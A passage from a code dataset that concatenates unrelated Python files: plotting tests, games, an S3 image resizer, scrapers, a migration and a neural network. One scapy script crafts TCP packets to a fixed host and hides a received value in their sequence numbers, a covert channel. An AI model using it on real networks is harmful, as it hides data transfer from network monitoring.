p.show()\n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_opacity_by_array():\n mesh = examples.load_uniform()\n # Test with opacity array\n mesh['opac'] = mesh['Spatial Point Data'] / 100.\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh, scalars='Spatial Point Data', opacity='opac',)\n p.show()\n # Test with uncertainty array (transparency)\n mesh['unc'] = mesh['Spatial Point Data']\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh, scalars='Spatial Point Data', opacity='unc',\n use_transparency=True)\n p.show()\n # Test using mismatched arrays\n with pytest.raises(RuntimeError):\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh, scalars='Spatial Cell Data', opacity='unc',)\n p.show()\n # Test with user defined transfer function\n opacities = [0,0.2,0.9,0.2,0.1]\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(mesh, scalars='Spatial Point Data', opacity=opacities,)\n p.show()\n\n\ndef test_opacity_transfer_functions():\n n = 256\n mapping = pyvista.opacity_transfer_function('linear', n)\n assert len(mapping) == n\n mapping = pyvista.opacity_transfer_function('sigmoid_10', n)\n assert len(mapping) == n\n with pytest.raises(KeyError):\n mapping = pyvista.opacity_transfer_function('foo', n)\n with pytest.raises(RuntimeError):\n mapping = pyvista.opacity_transfer_function(np.linspace(0, 1, 2*n), n)\n foo = np.linspace(0, n, n)\n mapping = pyvista.opacity_transfer_function(foo, n)\n assert np.allclose(foo, mapping)\n foo = [0,0.2,0.9,0.2,0.1]\n mapping = pyvista.opacity_transfer_function(foo, n, interpolate=False)\n assert len(mapping) == n\n foo = [3, 5, 6, 10]\n mapping = pyvista.opacity_transfer_function(foo, n)\n assert len(mapping) == 
n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_closing_and_mem_cleanup():\n n = 5\n for _ in range(n):\n for _ in range(n):\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n for k in range(n):\n p.add_mesh(pyvista.Sphere(radius=k))\n p.show()\n pyvista.close_all()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_above_below_scalar_range_annotations():\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(examples.load_uniform(), clim=[100, 500], cmap='viridis',\n below_color='blue', above_color='red')\n p.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_user_annotations_scalar_bar():\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_mesh(examples.load_uniform(), annotations={100.:'yum'})\n p.show()\n p = pyvista.Plotter(off_screen=OFF_SCREEN)\n p.add_volume(examples.load_uniform(), annotations={100.:'yum'})\n p.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_string_array():\n mesh = examples.load_uniform()\n labels = np.empty(mesh.n_cells, dtype=' \"OptimizationInput\":\n \"\"\"\n Creates a OptimizationInput schema.\n \"\"\"\n\n assert record.initial_molecule == initial_molecule.id\n if record.qc_spec.keywords:\n assert record.qc_spec.keywords == qc_keywords.id\n\n qcinput_spec = form_qcinputspec_schema(record.qc_spec, keywords=qc_keywords)\n\n model = qcel.models.OptimizationInput(\n id=record.id,\n initial_molecule=initial_molecule,\n keywords=record.keywords,\n extras=record.extras,\n hash_index=record.hash_index,\n input_specification=qcinput_spec,\n protocols=record.protocols,\n )\n return model\n","sub_path":"qcfractal/procedures/optimization.py","file_name":"optimization.py","file_ext":"py","file_size_in_byte":12109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"557290702","text":"\"\"\"Dice Math, by Al Sweigart al@inventwithpython.com\n\nTODO\"\"\"\n\n# TODO - this program needs more polish and refactoring.\n\nimport random, time\n\n# Set up the constants:\nQUIZ_DURATION = 30 # 30 seconds\nDICE_WIDTH = 9\nDICE_HEIGHT = 5\nSCREEN_WIDTH = 79\nSCREEN_HEIGHT = 24\nMIN_DICE = 2\nMAX_DICE = 5\n\nD1 = (['+-------+',\n '| |',\n '| O |',\n '| |',\n '+-------+'], 1)\n\nD2a = (['+-------+',\n '| O |',\n '| |',\n '| O |',\n '+-------+'], 2)\n\nD2b = (['+-------+',\n '| O |',\n '| |',\n '| O |',\n '+-------+'], 2)\n\nD3a = (['+-------+',\n '| O |',\n '| O |',\n '| O |',\n '+-------+'], 3)\n\nD3b = (['+-------+',\n '| O |',\n '| O |',\n '| O |',\n '+-------+'], 3)\n\nD4 = (['+-------+',\n '| O O |',\n '| |',\n '| O O |',\n '+-------+'], 4)\n\nD5 = (['+-------+',\n '| O O |',\n '| O |',\n '| O O |',\n '+-------+'], 5)\n\nD6a = (['+-------+',\n '| O O |',\n '| O O |',\n '| O O |',\n '+-------+'], 6)\n\nD6b = (['+-------+',\n '| O O O |',\n '| |',\n '| O O O |',\n '+-------+'], 6)\n\nALL_DICE = [D1, D2a, D2b, D3a, D3b, D4, D5, D6a, D6b]\n\nprint(\"\"\"Dice Math, by Al Sweigart al@inventwithpython.com\n\nTODO blah blah 30 seconds \"\"\")\n\ncorrectAnswers = 0\nincorrectAnswers = 0\nstartTime = time.time()\nwhile time.time() < startTime + QUIZ_DURATION: # Main game loop.\n # Come up with the dice to display:\n sumAnswer = 0\n diceFaces = []\n for i in range(random.randint(MIN_DICE, MAX_DICE)):\n die = random.choice(ALL_DICE)\n diceFaces.append(die[0])\n sumAnswer += die[1]\n\n # Place dice on canvas:\n topLeftDiceCorners = []\n for 
i in range(len(diceFaces)):\n while True: # Keep looping until we find a non-overlapping place for the die.\n x = random.randint(0, SCREEN_WIDTH - 1 - DICE_WIDTH)\n y = random.randint(0, SCREEN_HEIGHT - 1 - DICE_HEIGHT - 3) # -3 so we have room to enter the sum\n\n overlaps = False\n for prevDie in topLeftDiceCorners:\n topLeftX = x\n topLeftY = y\n topRightX = x + DICE_WIDTH\n topRightY = y\n bottomLeftX = x\n bottomLeftY = y + DICE_HEIGHT\n bottomRightX = x + DICE_WIDTH\n bottomRightY = y + DICE_HEIGHT\n\n for cornerx, cornery in ((topLeftX, topLeftY), (topRightX, topRightY), (bottomLeftX, bottomLeftY), (bottomRightX, bottomRightY)):\n if (prevDie[0] <= cornerx < (prevDie[0] + DICE_WIDTH)) and (prevDie[1] <= cornery < (prevDie[1] + DICE_HEIGHT)):\n overlaps = True\n if not overlaps:\n break\n topLeftDiceCorners.append((x, y))\n\n # Draw on canvas:\n canvas = {} # Keys are (x, y) tuples of ints, values are one-char strings.\n for i, dieCorner in enumerate(topLeftDiceCorners):\n for ix in range(DICE_WIDTH):\n for iy in range(DICE_HEIGHT):\n # TODO add comment explaining this:\n canvas[(dieCorner[0] + ix, dieCorner[1] + iy)] = diceFaces[i][iy][ix]\n\n # Display canvas on the screen:\n for y in range(SCREEN_HEIGHT):\n for x in range(SCREEN_WIDTH):\n print(canvas.get((x, y), ' '), end='')\n print() # Print a newline.\n\n response = input('Enter the sum: ').strip()\n if response.isdecimal() and int(response) == sumAnswer:\n correctAnswers += 1\n else:\n incorrectAnswers += 1\n\nprint('Correct: ', correctAnswers)\nprint('Incorrect:', incorrectAnswers)\nprint('Score: ', (correctAnswers * 3) - incorrectAnswers)\n","sub_path":"src/gamesbyexample/dicemath.py","file_name":"dicemath.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"47413644","text":"# class Solution:\n# def isMatch(self, s, p):\n# temp=0\n# for x in range(len(p)):\n# if temp>len(s)-1 or x>len(p)-1:\n# return False\n# if p[x]==\".\":\n# temp+=1\n# elif p[x]==\"*\":\n# if p[x-1]==\".\":\n# return True\n# while temp 0 and (s[i-1]\n == p[j-2] or p[j-2] == '.') and dp[i-1][j])\n else:\n dp[i][j] = i > 0 and dp[i-1][j -\n 1] and (s[i-1] == p[j-1] or p[j-1] == '.')\n return dp[m][n]\n\n\n# solution = Solution()\n# print(solution.isMatch(\"ab\", \".*c\"))\n\nprint(dp(\"ab\", \".*c\"))\n","sub_path":"10. Regular Expression Matching.py","file_name":"10. 
Regular Expression Matching.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"241556219","text":"from scapy.all import *\nimport base64\nimport logging\nlogging.getLogger('scapy.runtime').setLevel(logging.ERROR)\nfrom threading import Timer\nimport time\nimport xlrd\nimport string\nfrom socket import *\nimport psutil\nimport base64\n\ndef start_tcp(target_ip,target_port,source_port):\n print('Performing the handshake')\n global sport,s_seq,d_seq # used to keep sending data after the TCP three-way handshake establishes the connection\n try:\n # First handshake step: send the SYN packet\n #ans = sr1(IP(dst=target_ip)/TCP(dport=target_port,sport=source_port,seq=RandInt(),flags='S'),verbose=False)\n ans = sr1(IP(dst=target_ip)/TCP(dport=target_port,sport=source_port,seq=0,flags='S',options=[('MSS',48),('SAckOK', '')]),verbose=False)\n #ans.show()\n sport = ans[TCP].dport # random source port\n s_seq = ans[TCP].ack # source sequence number (the server has already added 1 to the initial value)\n d_seq = ans[TCP].seq + 1 # acknowledgment number: the server's sequence number plus 1\n # Third handshake step: send the ACK packet\n send(IP(dst=target_ip)/TCP(dport=target_port,sport=source_port,ack=d_seq,seq=s_seq,flags='A'),verbose=False)\n print('TCP three-way handshake succeeded!!')\n\n except Exception:\n print(\"TCP connection error!!\")\n time.sleep(1)\n return ans,d_seq,s_seq\ndef Read_excel(file_path):\n wb = xlrd.open_workbook(filename=file_path)# open the workbook\n sheet1 = wb.sheet_by_index(0)# get the sheet by index\n cols2 = sheet1.col_values(2) # data from column 3 (interval times)\n cols3 = sheet1.col_values(3) # data from column 4 (packet counts)\n cols4 = sheet1.col_values(4) # data from column 5 (total bytes sent)\n return cols2, cols3, cols4\n \ndef Read_txt(file_path):\n info1 = []\n info2 = []\n info3 = []\n for line in open(file_path):\n info1.append(line.split(',')[0])\n info2.append(line.split(',')[1])\n info3.append(line.split(',')[2])\n \n return info1, info2,info3\ndef add_pkt(seq_value,blen,target_ip,target_port,my_ip): # build one padded packet from a line of the TXT input\n blenadd=int(blen)#-40\n if blenadd <=0:\n blenadd=0\n if blenadd >= 1600:\n blenadd=1600\n #seq_value=int(seq_value)\n print(seq_value,blenadd)\n datas4 = ''.join(random.sample(string.ascii_letters*300 + string.digits, int(blenadd)))\n datas4 = datas4.encode('utf-8')\n ip = IP(src=my_ip,dst=target_ip)\n tcp = TCP(sport=source_port,dport=80,flags='PA',seq=seq_value,ack=1) # packet carrying the covert payload in its seq field\n pkt =ip/tcp/datas4\n send(pkt,verbose=0)\ndef add_pkt_loop(info,seq_hidden,target_ip,target_port,my_ip):\n\tfor i in range(1,len(info3)):\n\t\tif i==1:\n\t\t\tblen=int(info3[0])\n\t\telse:\n\t\t\tblen=int(info3[i-1])-int(info3[i-2])\n\t\tif i==int(where_is):\n\t\t\tadd_pkt(seq_hidden,blen,target_ip,target_port,my_ip)\n\t\telse:\n\t\t\tadd_pkt(int(info3[i-1]),blen,target_ip,target_port,my_ip)\n\t\ttime.sleep(1)\ndef TCP_wave():\n print('Sending FIN') \n send(IP(dst=target_ip)/TCP(dport=target_port,sport=source_port,flags=17),verbose=False) \ndef Listen_con(ip):\n ADDR = (ip, 8080)\n tcpSerSock = socket(AF_INET, SOCK_STREAM)\n tcpSerSock.bind(ADDR)\n tcpSerSock.listen(5)\n print('waiting for connection')\n tcpCliSock, addr = tcpSerSock.accept()\n print('Connection established!!!')\n return tcpCliSock\n\ndef Get_ip():\n info = psutil.net_if_addrs() # returns interface info, similar to ipconfig\n print(info['WLAN'][1][1])\n return info['WLAN'][1][1]\n\ndef seq_scapy(ip):\n ip = ip#\"192.168.1.100\"#Get_ip()\n dst_socket = Listen_con(ip)\n rev_msg = dst_socket.recv(1024)\n rev_msg_str =base64.b64decode(rev_msg.decode('utf-8'))\n rev_msg_int =int(base64.b64decode(rev_msg.decode('utf-8')))\n #print(rev_msg_int)\n send_msg = rev_msg\n dst_socket.send(send_msg)\n\n #dst_socket = Listen_con(ip)\n rev_msg2 = dst_socket.recv(1024)\n rev_msg2_str =base64.b64decode(rev_msg2.decode('utf-8'))\n 
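# The connected client sends the covert value as base64-encoded ASCII digits: one b64decode yields the digit bytes (e.g. base64.b64decode('MTIzNDU=') == b'12345'), and the int() conversion below recovers the integer later used as the hidden TCP seq value.\n 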
rev_msg2_int =int(base64.b64decode(rev_msg2.decode('utf-8')))\n #print(rev_msg2_int)\n send_msg2 = rev_msg2\n dst_socket.send(send_msg2)\n return rev_msg_int,rev_msg2_int\nif __name__ == '__main__':\n my_ip ='192.168.1.102'\n rev_msg_int,rev_msg2_int=seq_scapy(my_ip)\n target_ip = '192.168.1.109'#input('Enter the destination host IP address: ')\n target_port = 80#int(input('Enter the destination host port: '))\n source_port = random.randint(1024, 65535)# source port\n info1, info2 ,info3= Read_txt('1.txt')\n where_is=20\n print('Read complete')\n print('Preparing to connect and send packets')\n seq_hidden =rev_msg2_int#int(input('Covert channel payload (int): '))\n time.sleep(0.5)\n start_tcp(target_ip,target_port,source_port)\n add_pkt_loop(info3,seq_hidden,target_ip,target_port,my_ip)\n TCP_wave()\n","sub_path":"work/scapy_tcp4端不带key包比较总包长/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"346684878","text":"import io\nimport os\nimport urllib.request\n\nfrom app import config\n\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\n\nfrom PIL import Image\n\n\ndef s3_change_image_resolutions(image_route, filename):\n conn = S3Connection(config.AWS_ACCESS_KEY_ID, config.AWS_SECRET_ACCESS_KEY)\n bucket = conn.get_bucket(config.AWS_IMAGE_BUCKET)\n key = Key(bucket)\n\n url = \"{}/{}/{}\".format(config.AWS_IMAGES_BASE, image_route, filename)\n # Retrieve our source image from a URL\n fp = urllib.request.urlopen(url)\n content_type = fp.info().get('content-type')\n # Load the URL data into an image\n img = io.BytesIO(fp.read())\n img_original = Image.open(img)\n\n change_image_resolution(image_route, filename, img_original, content_type, 500, key)\n change_image_resolution(image_route, filename, img_original, content_type, 1000, key)\n change_image_resolution(image_route, filename, img_original, content_type, 2000, key)\n change_image_resolution(image_route, filename, img_original, content_type, 4000, key)\n change_image_resolution(image_route, filename, img_original, content_type, 6000, key)\n\n img.close()\n fp.close()\n\n\ndef update_image_headers(image_route, filename):\n conn = S3Connection(config.AWS_ACCESS_KEY_ID, config.AWS_SECRET_ACCESS_KEY)\n bucket = conn.get_bucket(config.AWS_IMAGE_BUCKET)\n key = Key(bucket)\n\n url = \"{}/{}/{}\".format(config.AWS_IMAGES_BASE, image_route, filename)\n # Retrieve our source image from a URL\n fp = urllib.request.urlopen(url)\n content_type = fp.info().get('content-type')\n # Load the URL data into an image\n img = io.BytesIO(fp.read())\n\n # img.seek(0, os.SEEK_END)\n # content_length = img.tell()\n # img.seek(0)\n\n key.key = '{}/{}'.format(image_route, filename)\n key.set_contents_from_string(img.getvalue(),\n headers={'Content-Type': content_type,\n 'x-amz-meta-Cache-Control': 'max-age=31536000',\n 'Cache-Control': 'max-age=31536000'},\n replace=True,\n policy='public-read')\n img.close()\n\n\ndef change_image_resolution(image_route, filename, img_original, content_type, width, key):\n # Resize the image\n new_size = get_width_height(img_original.size, width)\n img_resized = img_original.resize(new_size, Image.NEAREST)\n\n # NOTE, we're saving the image into a BytesIO object to avoid writing to disk\n out_location = io.BytesIO()\n file_type = get_file_type(content_type)\n img_resized.save(out_location, file_type)\n\n key.key = '{}/{}'.format(image_route, new_filename(filename, width))\n key.set_contents_from_string(out_location.getvalue(),\n headers={'Content-Type': content_type,\n 'x-amz-meta-Cache-Control': 'max-age=31536000',\n 
'Cache-Control': 'max-age=31536000'},\n replace=True,\n policy='public-read')\n out_location.close()\n\n\ndef get_file_type(content_type):\n c, ext = content_type.split('/')\n return ext\n\n\ndef get_width_height(original_size, width):\n if width >= original_size[0]:\n return original_size\n percent = float(width) / float(original_size[0])\n height = int(original_size[1] * percent)\n return (width, height)\n\n\ndef new_filename(filename, width):\n name, ext = os.path.splitext(filename)\n if width <= 500:\n additional_name = 'thumbnail'\n elif width <= 1000:\n additional_name = 'small'\n elif width <= 2000:\n additional_name = 'medium'\n elif width <= 4000:\n additional_name = 'large'\n elif width <= 6000:\n additional_name = 'grande'\n else:\n additional_name = 'jumbo'\n return \"{}_{}\".format(name, additional_name)\n","sub_path":"app/utils/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"367919035","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom pandas import ExcelWriter\n\n\n\n\ndf = pd.DataFrame(columns=['DataAprovacao', 'UF', 'ValorAprovado'])\n\nurl = r'http://www2.esporte.gov.br/leiincentivo/leiIncentivoEsporte/consultaProjetosAprovadosAptosCaptacao.do?acao=consultar&dtInicio=01%2F01%2F2018&dtFinal=31%2F12%2F2018&sgUf=&municipioVO.idMunicipio=&nrSLIE=&nmProponente=&nmProjeto=&modalidadeEsportivaVO.idModalidadeEsportiva=0&areaFinalisticaVO.idAreaFinalistica=0&nrProcesso='\n\n\n#url=r'http://www2.esporte.gov.br/leiincentivo/leiIncentivoEsporte/consultaProjetosAprovadosAptosCaptacao.do?acao=consultar&dtInicio=01%2F01%2F2019&dtFinal=30%2F01%2F2019&sgUf=&municipioVO.idMunicipio=&nrSLIE=&nmProponente=&nmProjeto=&modalidadeEsportivaVO.idModalidadeEsportiva=0&areaFinalisticaVO.idAreaFinalistica=0&nrProcesso='\npage = requests.get(url)\nsoup = BeautifulSoup(page.content, 'html.parser')\nx = soup.find_all('table', class_='tabelaConteudo')\nufs = []\nfor item in range(1, len(x)):\n uf = x[item].select('td b')[5]\n uf = uf.contents[0]\n data_aprovacao = x[item].select('td b')[15]\n data_aprovacao = data_aprovacao.contents[0]\n valor_aprovado = x[item].select('td b')[11]\n valor_aprovado = valor_aprovado.contents[0]\n df = df.append({'UF': uf, 'DataAprovacao': data_aprovacao, 'ValorAprovado' : valor_aprovado}, ignore_index=True)\n\n\npage = requests.get(url)\nsoup = BeautifulSoup(page.content, 'html.parser')\nx = soup.find_all(class_='strong alignRight')\nufs = []\nfor item in range(1, len(x)):\n ufs.append(x[item].contents[0].contents[0])\n\n\n\nufs.insert(0,'0,00')\n\n\n\ndf['ValorCaptado'] = ufs\n\n\n\nwriter = ExcelWriter(r'C:\\Users\\gustavomartins\\Desktop\\df1.xlsx')\ndf.to_excel(writer,'Sheet1', index=False)\nwriter.save()","sub_path":"codigos/crawler_projetos_2018.py","file_name":"crawler_projetos_2018.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"191926516","text":"#!/usr/bin/env python\n# Basic\nimport sys\nimport os\nimport pdb\nimport gc\n# Analysis\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom math import *\nsys.path.append(os.environ['HOME']+'/projects/bob-analysis')\nfrom scan_run_read import ScanFinal\nfrom seed_data import uc\n\n'''\nName: figK-N_frac_succ_vs_param_value.py\nDescription: Program to make Fig5K-N Fraction success vs single parameter statscan 
runs\nInput: This directory should contain _Seed_Criteria.dat from scan files of differing parameters\nOutput: Scatter plot with error bars showing the successful fraction vs the designated parameter value.\n'''\n\nclass Fig5KN():\n def __init__(self, dir_path):\n self.dir_path = os.path.abspath(dir_path)\n self.title_prefix = self.dir_path.split('/')[-1]\n self.dat_files = []\n self.scan_list = []\n self.GetScans()\n\n def GetScans(self):\n self.dat_files += [ f for f in os.listdir(self.dir_path) if f.endswith('.dat')]\n self.dat_files.sort(reverse=True)\n # Comment this\n for f in self.dat_files:\n self.scan_list += [ScanFinal(f)]\n self.scan_list[-1].scatter_flag = True\n\n def GraphSuccFracScatter(self):\n font ={'size' : 20,\n 'family' : 'Times'}\n mpl.rc('font', **font)\n mpl.rc('text', usetex=True)\n # fig, axarr = plt.subplots(5,1, figsize=(20,30))\n\n for sr in self.scan_list:\n p = sr.GetParam()\n fig = plt.figure()\n ax = plt.subplot()\n sr.GraphSuccessPercentBar(ax, p, cbflag=False)\n self.ModifyXLabel(ax, p)\n plt.draw()\n ax.xaxis.set_major_locator(mpl.ticker.MaxNLocator())\n plt.tight_layout()\n plt.savefig(r'{}_{}.pdf'.format(self.title_prefix, p))\n fig.clf()\n plt.close()\n gc.collect()\n\n def ModifyXLabel(self, ax, p):\n if p == 'N':\n ax.set_xlabel(r'Number of Crosslinkers')\n elif p == 'svs':\n ax.set_xlabel(r'Shrinking Speed Stabilization Factor')\n elif p == 'svg':\n ax.set_xlabel(r'Growth Speed Stabilization Factor')\n elif p == 'sfr':\n ax.set_xlabel(r'Rescue Frequency Stabilization Factor')\n elif p == 'sfc':\n ax.set_xlabel(r'Catastrophe Frequency Stabilization Factor')\n elif p == 'fc':\n ax.set_xlabel(r'Catastrophe Frequency (min$^{-1}$)')\n elif p == 'fr':\n ax.set_xlabel(r'Rescue Frequency (min$^{-1}$)')\n elif p == 'vg':\n ax.set_xlabel(r'Growth Speed ($\\mu$m/min)')\n elif p == 'vs':\n ax.set_xlabel(r'Shrinking Speed ($\\mu$m/min)')\n elif p == 'wf':\n ax.set_xlabel(r'Asymptotic Wall Force (pN)')\n\n\n##########################################\nif __name__ == \"__main__\":\n dir_path = sys.argv[1]\n a = Fig5KN(dir_path)\n a.GraphSuccFracScatter()\n\n\n\n\n","sub_path":"Spindles/Ase1_paper/figK-N_frac_succ_vs_param_value.py","file_name":"figK-N_frac_succ_vs_param_value.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"165798838","text":"\nimport requests, langdetect\n\n\nurl = \"https://www.bibsonomy.org/json/search/bibliometrie?items=1000\"\n\nresponse = requests.get(url)\n\ndata = response.json()\n\nitems = data[\"items\"]\n\n\npublications = [item for item in items if item[\"type\"] == \"Publication\"]\n\n\nger_publications = [item for item in publications\n if langdetect.detect(item[\"label\"]) == \"de\"]\n\n\nger_pubs_with_abstract = [item for item in ger_publications if \"abstract\" in item]\n\ncount = 0\nfor publication in ger_pubs_with_abstract:\n count = count + 1\n \n bereinigt = (\"[\" + str(count) + \".]\" + \"\\n\\n\" + publication[\"label\"] + \"\\n\\n\"\n + publication[\"abstract\"] + \"\\n\\n\")\n with open(\"bibsonomy_to_lingo.txt\", \"a\") as txt_file:\n txt_file.write(bereinigt)\n\n\n\n\n\n\n\n\n \n\n","sub_path":"Modul_2/Aufgabe 2.1 Bibsonomy.py","file_name":"Aufgabe 2.1 Bibsonomy.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"538575523","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\ndef conv3x3(in_planes, out_planes, 
stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=0, bias=False)\n\nclass ScanNet(nn.Module):\n\n def __init__(self):\n super(ScanNet, self).__init__()\n self.convnet = nn.Sequential(\n conv3x3(in_planes=1, out_planes=32, stride=1),\n nn.ReLU(),\n conv3x3(in_planes=32, out_planes=32, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(3),\n conv3x3(in_planes=32, out_planes=64, stride=1),\n nn.ReLU(),\n conv3x3(in_planes=64, out_planes=64, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(3),\n )\n self.block1 = nn.Sequential(\n conv3x3(in_planes=1, out_planes=16, stride=1),\n conv3x3(in_planes=16, out_planes=16, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n conv3x3(in_planes=16, out_planes=32, stride=1),\n conv3x3(in_planes=32, out_planes=32, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n\n self.block2 = nn.Sequential(\n conv3x3(in_planes=1, out_planes=16, stride=1),\n conv3x3(in_planes=16, out_planes=16, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n conv3x3(in_planes=16, out_planes=32, stride=1),\n conv3x3(in_planes=32, out_planes=32, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n self.block2 = nn.DataParallel(self.block2)\n\n self.fc = nn.Sequential(\n nn.Linear(1032256, 512),\n nn.Linear(512,512),\n nn.Linear(512, 2)\n )\n\n self.fc512 = nn.Linear(401408, 512)\n self.relu = nn.ReLU()\n self.dropout1 = nn.Dropout(0.1)\n self.fc128 = nn.Linear(512, 128)\n self.dropout2 = nn.Dropout(0.1)\n self.fc64 = nn.Linear(128, 64)\n self.dropout3 = nn.Dropout(0.1)\n self.fc32 = nn.Linear(64,32)\n self.dropout4 = nn.Dropout(0.1)\n self.fc3 = nn.Linear(128,2)\n\n def forward(self, input1, input2):\n\n\n #out1 = self.convnet(input1)\n #out2 = self.convnet(input2)\n out1 = self.block1(input1)\n out2 = self.block2(input2)\n\n out1 = out1.view(out1.size(0), -1)\n out2 = out2.view(out2.size(0), -1)\n\n input = torch.cat((out1, out2), 1)\n\n out = self.fc(input)\n\n return out\n\n\n","sub_path":"ScanNet.py","file_name":"ScanNet.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"26740088","text":"from glob import glob\nimport os\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom ingest import tasks\n\nclass Command(BaseCommand):\n\thelp = 'Creates source data from supplied data, adds source data to database, transforms data and pushes to ES'\n\n\tdef add_arguments(self, parser):\n\t\tparser.add_argument('-n', '--new', dest='new', action='store_true', help='process only new contributions')\n\t\tparser.add_argument('-i', '--inst', dest='inst', help='optional argument for single contributor ingest')\n\n\tdef handle(self, *args, **options):\n\t\tdata_path = settings.DATAPATH\n\t\tes = settings.ES\n\t\tgulpcmd = settings.GULPCMD\n\n\t\tif options['inst'] is not None:\n\t\t\tinst = options['inst']\n\t\telse:\n\t\t\tinst = '*'\n\n\t\tnew_insts = []\n\t\tif options['new'] is True:\n\t\t\tsupplied_dirs = '{}/supplied_data/{}'.format(data_path, inst)\n\t\t\tfor supplied_dir in glob(supplied_dirs):\n\t\t\t\ttasks.create_source(data_path, supplied_dir, es)\n\t\t\t\tnew_insts.append(supplied_dir.split(\"/\")[-1].split(\"_\")[0])\n\t\t\ttasks.build_sitemaps()\n\t\telse:\n\t\t\tinst_dirs = '{}/source_data/{}'.format(data_path, inst)\n\t\t\tfor inst_dir in glob(inst_dirs):\n\t\t\t\tinst = inst_dir.split('/')[-1]\n\t\t\t\tprint(inst)\n\t\t\t\tdate_dirs = '{}/*'.format(inst_dir)\n\t\t\t\tfor date_dir in 
glob(date_dirs):\n\t\t\t\t\tprint(date_dir)\n\t\t\t\t\ttasks.process_data(inst, date_dir, es)\n\n\t\ttasks.update_date_total(options['new'], new_insts)\n\t\ttasks.clean_rss()\n\n\t\tos.system('gulp clean:config')\n\t\tos.system(gulpcmd)\n","sub_path":"src/server/ingest/management/commands/process_contributions.py","file_name":"process_contributions.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"350787651","text":"\"\"\"empty message\n\nRevision ID: d59ff87ac474\nRevises: c1c48bd92a3f\nCreate Date: 2020-07-27 14:39:16.318386\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd59ff87ac474'\ndown_revision = 'c1c48bd92a3f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(None, 'user', ['username'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'user', type_='unique')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/d59ff87ac474_.py","file_name":"d59ff87ac474_.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"201621658","text":"#Jake Lorah\r\n#Coded in: Python 3.4.3\r\n#Project2.py\r\n\r\n#Updated changes 10/30/18:\r\n #I changed the name of the methods from forward, backward, left, right, to jakeforward, jakebackward, jakeleft, jakeright.\r\n #I changed the if condition from < (less than) sign to <= (less than or equal to) sign.\r\n #I added a new method from the API list called color. 
turtle.color(\"black\", \"darkgreen\") changed the color of the turtle to dark green with a black outline.\r\n #I changed the size of the turtle to make it a little bigger.\r\n #I changed penup to pendown so that the turtle's path keeps a trail.\r\n #I changed the background color to dark khaki so that it looks similar to dirty water like a stream or a pond.\r\n #I added a new method from the API list called stamp that prints the turtle on the screen right when you start the program to show where you began as you move the turtle around the world.\r\n #I added a second turtle you can control with the keys: W, A, S, D.\r\n #I changed the dimensions of the screen to be larger.\r\n #I made the color of turtle2 blue with a white outline.\r\n #I changed the speed of both turtles to be a little faster.\r\n\r\n\r\nimport turtle\r\n\r\n#I changed the dimensions of the screen to be larger and more wide.\r\nHEIGHT = 900\r\nWIDTH = 1200\r\nscreen = turtle.Screen()\r\nscreen.setup(WIDTH,HEIGHT)\r\n\r\n#Click the image icon in the top right of the code window to see\r\n#which images are 